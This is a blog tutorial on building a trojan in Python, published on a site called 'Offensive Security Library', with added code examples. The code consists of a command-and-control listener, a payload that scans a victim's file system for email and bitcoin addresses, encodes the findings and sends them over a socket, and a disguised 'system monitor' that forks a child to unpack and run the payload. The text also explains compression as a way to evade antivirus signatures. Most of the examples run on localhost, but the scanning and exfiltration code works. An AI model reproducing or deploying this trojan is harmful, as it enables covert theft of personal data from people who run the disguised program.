Creating a Basic Trojan in Python

Aleksa Zatezalo
Offensive Security Library
3 min read · Oct 3, 2022
Image source: https://allthatsinteresting.com/trojan-horse

Recently a friend sent me a link to Hacktoberfest, a month-long challenge in October where participants must make four contributions to open source repositories on GitHub or GitLab. The first 40,000 participants to complete the challenge get a free T-shirt. I thought this was the perfect opportunity to not only contribute to existing open source repositories (I chose pythonping) but to make an open source Python package of my own. Due to my interest in cyber security I decided on creating a package that would help users make worms on their own. I know what you are thinking… what an amazing contribution to society. I am so glad you think the same (sarcasm intended). I took some time today to learn about how trojans are created and wanted to walk you through my learning. What we will be building today is a benign program that lets you understand how trojans function.

What Are Trojans

A trojan is a piece of malicious software masquerading as something benign, tricking the user into downloading and running it. Strictly speaking a trojan does not replicate on its own; that is what distinguishes it from a worm, which spreads itself across networks. The two techniques are often combined, though: a trojan is the lure that gets the first execution, and the payload it drops may then behave like a worm. The usual historical reference point is Creeper, written in 1971, a self-replicating program that moved between ARPANET hosts and printed "I'm the creeper, catch me if you can". Creeper was an experiment rather than a trojan, and it is better described as the first worm. The theoretical groundwork for self-replicating programs is John von Neumann's "Theory of Self-Reproducing Automata", published in 1966, a few years before Creeper ran. Many far more destructive trojans exist today.

Antivirus Evasion

Antivirus software scans files for patterns in the code and compares them against a list of known signatures (typically byte sequences or file hashes). To avoid matching those signatures, trojans obfuscate their code in various ways: encrypting it, compressing it, or introducing spaghetti logic, to name a few. We will be working with a compressed malicious piece of code today. Keep in mind that compression alone only defeats the most naive signature match on the file at rest; a real scanner will unpack common archive formats, and behavioural detection (a process that forks, opens a network socket and reads through the user's files) is not affected by how the code was stored.

The Actual Coding

Our project will consist of three parts: a command and control server that receives data, a compressed piece of malicious code that exfiltrates data, and a main file that masquerades as a system monitoring tool.

Command and Control Server

The command and control server is a relatively trivial piece of code: it opens a socket, listens for data, and writes whatever it receives to a file with a random name. Because this type of socket programming was covered in a previous tutorial I wrote on this blog, you can simply check out the completed code here.
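As an added example (my own code for this page, not the completed server the post links to), here is the receiving side written the way the description above lays it out: bind a TCP socket, accept one connection, read until the client closes, and write the bytes to a randomly named file. The `send_blob` helper is the matching client side, and `demo_roundtrip` runs both on localhost in one process so the exchange can be checked without a second machine. Host, port and the `.bin` file suffix are my choices.

```python
import os
import secrets
import socket
import tempfile
import threading


def make_listener(host="127.0.0.1", port=0):
    """Bind a TCP listening socket. Port 0 lets the OS pick a free port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(5)
    return srv


def receive_one(listener, outdir):
    """Accept a single connection, read until the client shuts down its write
    side, and save the payload under a random file name. Returns the path."""
    conn, _peer = listener.accept()
    chunks = []
    with conn:
        while True:
            chunk = conn.recv(4096)
            if not chunk:          # empty read == client closed / SHUT_WR
                break
            chunks.append(chunk)
    os.makedirs(outdir, exist_ok=True)
    path = os.path.join(outdir, secrets.token_hex(8) + ".bin")
    with open(path, "wb") as fh:
        fh.write(b"".join(chunks))
    return path


def send_blob(host, port, data):
    """Client side (what the implant does): connect, send, half-close."""
    with socket.create_connection((host, port), timeout=5) as cli:
        cli.sendall(data)
        cli.shutdown(socket.SHUT_WR)


def demo_roundtrip(data, outdir=None):
    """Run listener and client in one process on localhost.
    Returns (saved_path, bytes_written) so the exchange can be verified."""
    outdir = outdir or tempfile.mkdtemp(prefix="c2_")
    listener = make_listener()
    port = listener.getsockname()[1]
    result = {}

    def serve():
        result["path"] = receive_one(listener, outdir)

    worker = threading.Thread(target=serve)
    worker.start()
    send_blob("127.0.0.1", port, data)
    worker.join(timeout=10)
    listener.close()
    with open(result["path"], "rb") as fh:
        return result["path"], fh.read()


if __name__ == "__main__":
    saved, got = demo_roundtrip(b"constructed test payload")
    print(saved, got)
```

The half-close (`shutdown(SHUT_WR)`) is what lets the server use "read returned nothing" as the end-of-message marker; without it the listener would block forever waiting for more data.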

Malicious Code

Our malicious code will take five steps as follows:

  1. Open a socket.
  2. Get its public IP through IPAPI.com.
  3. Use regex to scan the file system for emails and bitcoin addresses.
  4. Format the findings as JSON and encode them.
  5. Send the data to our command and control server.

Upon completion this file must be zipped and its hash (the "signature" we will check before running it) saved. The tricky part of this is of course the regex, which takes some creativity, but the rest can be figured out simply using documentation. The code itself is relatively straightforward and looks like this:
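Here is an added example of steps 3 to 5 (my own code, not the post's embedded file). The regexes cover email addresses, legacy base58 bitcoin addresses (starting with 1 or 3) and bech32 addresses (starting with bc1); the sample text is constructed, using the well-known genesis-block address and the BIP173 example address. Step 2, the IPAPI lookup, is a plain HTTP GET and is left as the `public_ip` parameter so the example runs offline. `decode_report` is the inverse the C2 side would run on the saved file.

```python
import base64
import json
import os
import re
import socket

# Constructed sample input, not real victim data.
SAMPLE_TEXT = """
Contact: alice@example.com, or bob.smith+billing@mail.example.org
Donate: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa (legacy P2PKH)
or bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq (bech32 P2WPKH)
not an address: 0x52908400098527886E0F7030069857D2E4169EE7
"""

EMAIL_RE = re.compile(r"\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b")
# Legacy P2PKH/P2SH: base58 alphabet (no 0, O, I, l), 26-35 chars, starts with 1 or 3.
BTC_LEGACY_RE = re.compile(r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b")
# Bech32 (P2WPKH/P2WSH): 'bc1' + 39-59 chars from the bech32 alphabet, lowercase.
BTC_BECH32_RE = re.compile(r"\bbc1[qpzry9x8gf2tvdw0s3jn54khce6mua7l]{39,59}\b")


def extract_indicators(text):
    """Step 3 on one piece of text: de-duplicated, sorted emails and addresses."""
    emails = sorted(set(EMAIL_RE.findall(text)))
    btc = set(BTC_LEGACY_RE.findall(text)) | set(BTC_BECH32_RE.findall(text))
    return {"emails": emails, "bitcoin": sorted(btc)}


def scan_tree(root, max_bytes=1_000_000):
    """Step 3 over a directory: read each file (capped), merge the indicators."""
    merged = {"emails": set(), "bitcoin": set()}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            try:
                with open(os.path.join(dirpath, name), "rb") as fh:
                    blob = fh.read(max_bytes)
            except OSError:
                continue  # unreadable file: skip quietly, never crash the host program
            found = extract_indicators(blob.decode("utf-8", errors="ignore"))
            merged["emails"].update(found["emails"])
            merged["bitcoin"].update(found["bitcoin"])
    return {k: sorted(v) for k, v in merged.items()}


def build_report(public_ip, findings):
    """Step 4: JSON document, then base64 so the wire bytes are plain ASCII."""
    doc = {"ip": public_ip, "findings": findings}
    return base64.b64encode(json.dumps(doc, sort_keys=True).encode("utf-8"))


def decode_report(blob):
    """What the C2 side does with the saved file: inverse of build_report."""
    return json.loads(base64.b64decode(blob).decode("utf-8"))


def send_report(host, port, blob):
    """Steps 1 and 5: open a socket to the C2 listener and ship the report."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(blob)
        s.shutdown(socket.SHUT_WR)


if __name__ == "__main__":
    found = extract_indicators(SAMPLE_TEXT)
    print(json.dumps(decode_report(build_report("203.0.113.7", found)), indent=2))
```

The legacy regex is deliberately loose (any 26-35 character base58 token starting with 1 or 3), so on a real file system it will produce false positives such as git object prefixes; a checksum validation of the base58 payload is the usual next refinement.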

Main File

The main file is a little tricky and requires the use of forking. The principle behind it is simple: it must execute its "legitimate functionality" while starting a separate process to do the malicious work. After the fork, the parent process carries on with the "official" functionality while the child process decompresses the malicious file, checks it against the saved hash, and executes it. Those of you who studied C programming in university will find this straightforward, but others may need to do some research.
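As an added example (my own code, not the post's main file), here is the fork split with the compression and hash check from the earlier sections folded in. `PAYLOAD_SOURCE` is a constructed stand-in for the malicious module that only writes a marker file, so the flow can be run safely; the toy "system monitor" just samples the 1-minute load average. `os.fork` and `os.getloadavg` are Unix-only, which is an assumption of this example.

```python
import hashlib
import io
import os
import tempfile
import time
import zipfile

# Constructed stand-in payload: records which process ran it, nothing else.
PAYLOAD_SOURCE = """
import os
with open(MARKER_PATH, "w") as fh:
    fh.write("payload ran in pid %d" % os.getpid())
"""


def pack_payload(source, member="payload.py"):
    """Zip the payload source in memory; return (zip_bytes, sha256 of the zip)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(member, source)
    data = buf.getvalue()
    return data, hashlib.sha256(data).hexdigest()


def unpack_payload(zip_bytes, expected_sha256, member="payload.py"):
    """Refuse to run an archive whose hash differs from the one saved at pack time."""
    if hashlib.sha256(zip_bytes).hexdigest() != expected_sha256:
        raise ValueError("payload archive does not match the saved hash")
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return zf.read(member).decode("utf-8")


def legitimate_work(rounds=3):
    """The cover functionality: a toy system monitor sampling load average."""
    samples = []
    for _ in range(rounds):
        samples.append(os.getloadavg()[0])
        time.sleep(0.01)
    return samples


def run_split(zip_bytes, digest, marker_path):
    """Fork: parent does the visible work, child unpacks and runs the payload.
    Returns (parent samples, child exit status)."""
    pid = os.fork()
    if pid == 0:
        # Child: never returns into the parent's code path; _exit skips atexit
        # handlers and buffered output that belong to the parent.
        code = 0
        try:
            src = unpack_payload(zip_bytes, digest)
            exec(compile(src, "<payload>", "exec"), {"MARKER_PATH": marker_path})
        except Exception:
            code = 1
        os._exit(code)
    samples = legitimate_work()
    _, status = os.waitpid(pid, 0)
    return samples, os.WEXITSTATUS(status)


def demo():
    """Pack, fork, and return (samples, child status, marker file contents)."""
    zip_bytes, digest = pack_payload(PAYLOAD_SOURCE)
    marker = os.path.join(tempfile.mkdtemp(prefix="split_"), "marker.txt")
    samples, status = run_split(zip_bytes, digest, marker)
    with open(marker) as fh:
        return samples, status, fh.read()


if __name__ == "__main__":
    print(demo())
```

Two details worth noticing: the hash is computed over the archive, so tampering with the zip before it is unpacked is detected, and the parent waits for the child with `waitpid` so it does not leave a zombie behind, which is exactly the kind of process-tree artefact an analyst would look for.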

Putting it all together

Once you have written all the code, simply run the command and control server followed by the main file. You should see some data coming in. The process itself is relatively simple, programmatically speaking, but brings some cool new ideas and topics to light.

You can find the Open Source Repository I am building on my GitHub profile.

For the original tutorial look here:
